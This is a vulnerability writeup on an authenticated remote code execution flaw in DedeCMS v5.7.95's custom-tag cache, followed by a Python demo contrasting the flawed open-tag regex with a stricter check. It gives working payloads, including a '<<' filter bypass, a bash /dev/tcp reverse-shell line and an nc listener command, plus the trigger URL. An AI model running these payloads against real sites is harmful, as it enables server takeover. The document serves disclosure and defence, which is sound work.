DedeCMS official website: https://www.dedecms.com/download
DedeCMS v5.7.95 has an arbitrary command execution vulnerability in its backend (administrative) interface: an authenticated administrator can store PHP code in a custom tag, and the cache file generated from that tag is included and executed, which gives remote code execution (RCE).
Affected version: DedeCMS v5.7.95
First visit /dede and log in to the backend.
Visit dede/mytag_main.php and insert a new tag.
The main content of the tag is:

<<?=`ls`;?>

The backquote (`) operator in PHP is an alias of the shell_exec() function, so whatever sits between the backquotes is run as a shell command and its output is returned.
Click "OK" and note the number assigned to the tag (3 in this case). Visit /plus/mytag_js.php?arcID=3&nocache=1, where arcID=3 is the tag number. The tag body is then written to a cache file which is included straight away, so the command runs.
To go further and obtain a reverse shell, set the tag content to the following (127.0.0.1 is used here; in practice it is the attacker's address):

<<?=`bash -i &>/dev/tcp/127.0.0.1/2333 <&1`;?>

Start a listener with nc (or ncat):

nc -lvvp 2333

Then visit /plus/mytag_js.php?arcID=3&nocache=1 again and the reverse shell connects back successfully.
The vulnerable code is in plus/mytag_js.php: the file is included directly after it is written. The file name therefore does not matter (it carries a fixed .htm suffix anyway); what matters is the content of myvalues that gets written into the file.
The value of myvalues comes from a database query:

SELECT * FROM `#@__mytag` WHERE aid='$aid'

A global search for this table leads to mytag_add.php and mytag_edit.php, the two files that insert into or update it.
So visit mytag_main.php, which offers both the add and the edit operation.
Many dangerous function names are filtered in plus/mytag_js.php, but backquotes (`) are not, and the PHP open-tag check uses the pattern [^<]+<\?(php|=), which requires at least one character that is not '<' immediately before '<?':

// will be matched
abcde<?php `ls`;?>
<?=`ls`;?>
// will not be matched
<<?=`ls`?>

Because the character right in front of the open tag is another '<', the [^<]+ part has nothing to match, so prefixing the open tag with a second '<' bypasses the check. PHP still sees a valid <?= open tag (the leading '<' is just literal output before it), the backtick command executes, and RCE succeeds.
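The behaviour of that pattern, and what a correct check looks like, can be seen without a DedeCMS install. The following is an added example (not DedeCMS's code and not from the original writeup): it reimplements the quoted regex in Python, runs the writeup's tag bodies through it, and puts a hardened check beside it that rejects any PHP open tag regardless of what precedes it. It also shows, as a generic caveat and not as a claim about DedeCMS, why deleting open tags instead of rejecting the input is not a fix: a nested tag survives a single stripping pass. The sample tag bodies are constructed for the demo.

```python
import re

# Filter modelled on the pattern quoted in the writeup, [^<]+<\?(php|=):
# it only fires when at least one character that is NOT '<' sits directly
# in front of the PHP open tag.  Stand-in for illustration, not DedeCMS code.
WRITEUP_PATTERN = re.compile(r"[^<]+<\?(php|=)", re.IGNORECASE)

# Hardened check: reject any PHP open tag wherever it sits and whatever
# precedes it.  '<\?' alone also covers the bare short tag '<?'.  No
# function-name blacklist is involved, so backticks (shell_exec) are moot.
STRICT_PATTERN = re.compile(r"<\?")


def writeup_filter_blocks(body: str) -> bool:
    """True when the writeup's regex flags the tag body."""
    return WRITEUP_PATTERN.search(body) is not None


def strict_filter_blocks(body: str) -> bool:
    """True when the hardened check flags the tag body."""
    return STRICT_PATTERN.search(body) is not None


def strip_open_tags(body: str) -> str:
    """A sanitiser that deletes open tags instead of rejecting the input.
    Included only to show why one stripping pass is not a fix (generic
    caveat, not a description of DedeCMS's code)."""
    return re.sub(r"<\?(php|=)?", "", body, flags=re.IGNORECASE)


# Constructed tag bodies: the writeup's payloads plus a benign one.
SAMPLES = {
    "prefixed_php":     "abcde<?php `ls`;?>",
    "double_lt_bypass": "<<?=`ls`;?>",
    "reverse_shell":    "<<?=`bash -i &>/dev/tcp/127.0.0.1/2333 <&1`;?>",
    "benign_html":      '<a href="/">home</a>',
}
# Constructed nested tag aimed at the stripping sanitiser: removing the
# inner '<?' leaves a fresh '<?=' behind.
NESTED = "<<??=`ls`;?>"


def evaluate(samples=SAMPLES):
    """Return {name: (writeup_regex_blocks, strict_check_blocks)}."""
    return {name: (writeup_filter_blocks(b), strict_filter_blocks(b))
            for name, b in samples.items()}


if __name__ == "__main__":
    for name, (weak, strict) in evaluate().items():
        print(f"{name:18} writeup-regex blocks={weak!s:5} strict blocks={strict}")
    stripped = strip_open_tags(NESTED)
    print(f"stripping {NESTED!r} leaves {stripped!r}; "
          f"still contains an open tag: {strict_filter_blocks(stripped)}")
```

Running it shows the prefixed payload caught by both checks, both '<<' payloads slipping past the writeup's regex but caught by the strict check, and the benign HTML passing both. The stripped nested sample comes out as a live `<?=` tag, which is why the fix should reject tag bodies containing `<?` rather than try to clean them.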
See the reproduction process above for the concrete steps and exploitation.